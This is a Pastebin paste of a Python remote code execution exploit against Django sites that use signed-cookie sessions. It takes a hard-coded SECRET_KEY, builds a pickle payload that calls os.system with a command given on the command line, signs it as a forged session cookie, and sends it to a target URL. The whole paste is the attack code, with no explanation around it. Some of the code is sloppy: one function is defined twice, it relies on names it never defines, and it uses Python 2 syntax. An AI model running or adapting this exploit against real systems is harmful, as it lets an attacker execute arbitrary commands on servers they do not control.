Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # coding: UTF-8
- # Written by Orange@chroot.org
- #
- import sys
- import hmac
- import time
- import hashlib
- import base64
- from random import randint
- import requests
- URL = "http://vuln-django.orange.tw/"
- SECRET_KEY = "1%idg#a2%byqh@l1wcv^3kc=e*($0v44(u-c^@bf_lz-@#essk"
- SALT = "django.contrib.sessions.backends.signed_cookies"
- def salted_hmac(key_salt, value, secret=None):
- key = hashlib.sha1((key_salt + secret).encode('utf-8')).digest()
- return hmac.new(key, msg=force_bytes(value), digestmod=hashlib.sha1)
- def b64_encode(s):
- return base64.urlsafe_b64encode(s).strip(b'=')
- def b64_encode(s):
- return base64.urlsafe_b64encode(s).strip(b'=')
- def base64_hmac(salt, value, key):
- return b64_encode(salted_hmac(salt, value, key).digest())
- def force_bytes(s, encoding='utf-8', strings_only=False, errors='strict'):
- if isinstance(s, bytes):
- if encoding == 'utf-8':
- return s
- else:
- return s.decode('utf-8', errors).encode(encoding, errors)
- if strings_only and (s is None or isinstance(s, int)):
- return s
- if isinstance(s, Promise):
- return six.text_type(s).encode(encoding, errors)
- if not isinstance(s, six.string_types):
- try:
- if six.PY3:
- return six.text_type(s).encode(encoding)
- else:
- return bytes(s)
- except UnicodeEncodeError:
- if isinstance(s, Exception):
- return b' '.join([force_bytes(arg, encoding, strings_only,
- errors) for arg in s])
- return six.text_type(s).encode(encoding, errors)
- else:
- return s.encode(encoding, errors)
- force_str = force_bytes
- class Exploit:
- def __init__(self, key, salt):
- self.key = key
- self.salt = salt
- def signature(self, value):
- signature = base64_hmac(self.salt + 'signer', value, self.key)
- return force_str(signature)
- if __name__ == '__main__':
- if len( sys.argv ) < 2:
- print 'Usage: python rce.py command'
- exit()
- cmd = sys.argv[1]
- payload = b"cos\nsystem\n(S'%s'\ntR." % cmd
- payload = '%s:%d' % (b64_encode( payload ), time.time() )
- sig = Exploit(SECRET_KEY, SALT).signature( payload )
- headers = { 'Cookie': 'sessionid="%s:%s";' % (payload, sig) }
- url = '%s?%d' % ( URL, randint(0, 65535) )
- requests.get( url, headers=headers )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement